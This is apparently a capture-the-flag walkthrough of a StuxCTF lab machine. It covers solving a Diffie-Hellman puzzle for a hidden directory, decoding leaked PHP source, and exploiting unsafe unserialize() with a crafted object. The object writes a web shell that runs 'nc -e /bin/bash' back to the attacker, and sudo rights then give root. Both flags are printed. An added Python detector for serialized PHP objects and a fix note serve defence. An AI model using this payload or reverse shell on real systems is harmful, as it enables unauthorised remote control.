VOiD XD
My IP: 10.8.253.221
Target IP: 10.10.58.158
PORT 80 [http]
<!-- The secret directory is...
p: 9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251;
g: 7;
a: 330;
b: 450;
g^c: 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617;
-->
/robots.txt
# robots.txt generated by StuxCTF
# Diffie-Hellman
User-agent: *
Disallow:
Disallow: /StuxCTF/
Solving it (first 128 digits of g^(abc) mod p) gives the secret directory: 47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055
<!-- hint: /?file= -->
view-source:http://10.10.58.158/47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055/index.php?file=index.php
Decode the returned data (unhex, reverse, base64-decode) to recover index.php:
xxd -r -p data | rev | base64 -d > index.php
Solved Diffie-Hellman using this script:
# Diffie-Hellman solve script
# p, g, a, b and g^c come from the HTML comment on the index page
p = 9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251
g = 7
a = 330
b = 450
gc = 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617
# Shared secret g^(abc) mod p, computed with modular exponentiation
gca = pow(gc, a, p)
gcab = pow(gca, b, p)
# The secret directory is the first 128 digits of the result
print(str(gcab)[:128])
Payload generator (run at https://www.tutorialspoint.com/execute_php_online.php):
<?php
class file{
public $file= 'myshell.php';
public $data = '<?php shell_exec("nc -e /bin/bash 10.8.253.221 4444")?>';
}
echo (serialize(new file));
?>
Gives the exploit
O:4:"file":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:69:"<?php echo "Hey !"; shell_exec("nc -e /bin/bash 10.8.253.221 4444")?>";}
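A detection-side view of the payload above, as an added example that is not part of the original notes: a Python scanner that flags PHP-serialized objects arriving in query-string values. The log lines, the parameter name q and the marker list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Header of a PHP-serialized object: O:<name length>:"<class name>":<property count>:{
OBJ_RE = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')
# Substrings suggesting the value also carries executable PHP (assumed, not exhaustive).
CODE_MARKERS = ("<?php", "<?=", "shell_exec(", "system(", "passthru(")


def inspect_value(value):
    """Return one finding per serialized PHP object header in a decoded value."""
    findings = []
    for m in OBJ_RE.finditer(value):
        declared, cls = int(m.group(1)), m.group(2)
        findings.append({
            "class": cls,
            "props": int(m.group(3)),
            "length_ok": declared == len(cls.encode()),  # PHP counts bytes
            "code": any(marker in value for marker in CODE_MARKERS),
        })
    return findings


def scan_request(line):
    """Scan the query string of a 'METHOD URL PROTO' line; return (param, finding) pairs."""
    parts = line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits.extend((name, f) for f in inspect_value(value))
    return hits


# Constructed sample requests (hypothetical parameter names, benign phpinfo() body).
SAMPLE_LOG = [
    "GET /index.php?file=index.php HTTP/1.1",
    "GET /index.php?q=O%3A4%3A%22file%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A9%3A%22shell.php%22%3B"
    "s%3A4%3A%22data%22%3Bs%3A17%3A%22%3C%3Fphp+phpinfo%28%29%3F%3E%22%3B%7D HTTP/1.1",
    "GET /search?q=O%3A+level+results HTTP/1.1",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for param, finding in scan_request(entry):
            print(param, finding)
```

On the PHP side, the matching fix is to stop passing request data to unserialize(): use json_decode(), or call unserialize($input, ['allowed_classes' => false]) so no object of class file is ever instantiated.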
Shell [www-data]
www-data@ubuntu:/home/grecia$ cat user.txt
0b6044b7807dd100b9e30f1bd09db53f
www-data@ubuntu:/tmp$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: ALL
root@ubuntu:~# cat root.txt
0028454003b42601548df551b738976c